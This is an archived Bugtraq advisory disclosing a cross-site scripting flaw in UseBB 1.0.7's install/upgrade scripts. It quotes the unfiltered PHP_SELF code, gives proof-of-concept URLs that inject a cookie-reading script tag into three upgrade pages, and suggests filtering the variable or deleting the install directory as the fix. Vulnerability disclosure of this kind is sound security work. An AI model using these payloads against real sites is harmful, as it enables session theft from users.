Bugtraq mailing list archives

UseBB 1.0.x Cross Site Scripting (XSS)


From: s4mi () LinuxMail org
Date: 20 Jul 2007 19:54:36 -0000

#############################################################
#       Script...............: UseBB version: 1.0.7         #
#       Script Site..........: http://www.usebb.net         #
#       Vulnerability........: Cross Site Scripting (XSS)   #
#       Acces................: Remote                       #
#       level................: Dangerous                    #
#       Author...............: S4mi                         #
#       Contact..............: s4mi[at]LinuxMail.org        #
#############################################################

The affected Files :
====================
/UseBB/install/upgrade-0-2-3.php
/UseBB/install/upgrade-0-3.php
/UseBB/install/upgrade-0-4.php

vuln Code: line ~ 86
=====================
[code]
return '<form action="'.$_SERVER['PHP_SELF'].'" method="post"><p><input type="hidden" 
name="step" value="'.$step.'" /><input type="submit" value="' . ( ( $_POST['step'] == $step ) ? 'Retry step 
'.$step : 'Continue to step '.$step ) . '" /></p></form>';
[/code]

The variables PHP_SELF is used without filtering

PoC :
====================
http://127.0.0.1/UseBB/install/upgrade-0-2-3.php/";><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-3.php/";><ScRiPt>alert(document.cookie);</ScRiPt>
http://127.0.0.1/UseBB/install/upgrade-0-4.php/";><ScRiPt>alert(document.cookie);</ScRiPt>

Solution :
====================

filtre the PHP_SELF
or you know what's the best lool : Delete the Install directory :D

Shoutz :
====================
Simo64, DrackaNz, Iss4m, Coder212, HarDose, r0_0t, ddx39, E.chark, Nuck3r ....... & all Others


Current thread: